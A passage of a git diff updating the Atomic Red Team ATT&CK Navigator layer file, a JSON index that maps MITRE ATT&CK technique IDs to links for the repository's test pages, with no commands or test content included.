/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score
":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":1
00,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"
comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/at
omic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/b
lob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/
atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com
/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"h
ttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"c
omment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://gi
thub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index e2e54d82..4fd93aa6 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.
md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"commen
